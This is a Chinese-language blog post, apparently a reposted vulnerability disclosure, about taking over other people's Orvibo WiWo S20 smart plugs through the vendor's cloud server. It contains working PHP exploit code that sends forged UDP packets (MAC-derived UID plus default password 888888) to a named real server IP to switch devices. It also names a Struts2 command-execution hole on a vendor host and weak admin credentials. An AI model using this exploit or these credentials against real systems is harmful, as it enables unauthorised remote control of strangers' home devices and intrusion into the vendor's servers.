智能家居可大规模远程控制别人家的设备

我中意你家的外观设计,也非常佩服smart config的神奇设计,
可是就差那么一点点啊。

欧瑞博WiWo s20 智能插座

协议分析:

控制开关

智能家居可大规模远程控制别人家的设备

设备 uid = MAC + 0x202020202020

MAC 地址扫描BSSID

不同网段之间:

攻击者 (伪造UID+默认密码888888) -> 云端服务器

云端服务器 -> 攻击者(两个UDP回应包 )

攻击者 (UDP操作码) -> 云端服务器

云端服务器 ( UDP操作码) -> 控制设备

只需要知道其他人的mac地址 和密码(大部分是默认,不信看下面)就可以控制他人的设备

利用代码:

<?php

$fp = fsockopen('udp://42.121.111.208', 10000);

$send = pack('H*', 'xxxxxxxx36caccf23299bc4202020202020383838383838202020202020');

fwrite($fp, $send);

$recv = fread($fp, 8192);

$send = pack('H*', '686400176463accf23299bc42020202020206b00000000');

$send[18] = $recv[18];

$send[22] = $recv[23] == chr(0) ? chr(1) : chr(0);

fwrite($fp, $send);

$recv = fread($fp, 8192);

结合云端漏洞 就变恐怖了。。。。。。。。。

http://vicenter.orvibo.com:20001/ struts2 命令执行啊

管理员弱口令啊 用户名也都是 123456 123456

所以

智能家居可大规模远程控制别人家的设备

还能远程debug...

智能家居可大规模远程控制别人家的设备

还没mac 地址呢

别急

智能家居可大规模远程控制别人家的设备

我说都是弱口令吧

383838383838 hex 888888

可以本地发指令给云端 让云端 转发给设备

也可以直接云端发指令给设备。

当然还有 很多固件啊 你们的红外码 之类的都外漏了

智能家居可大规模远程控制别人家的设备

智能家居可大规模远程控制别人家的设备

分类:默认分类 时间:2012-01-06 人气:2
本文关键词:
分享到:

相关文章

Copyright (C) quwantang.com, All Rights Reserved.

趣玩堂 版权所有 京ICP备15002868号

processed in 0.079 (s). 9 q(s)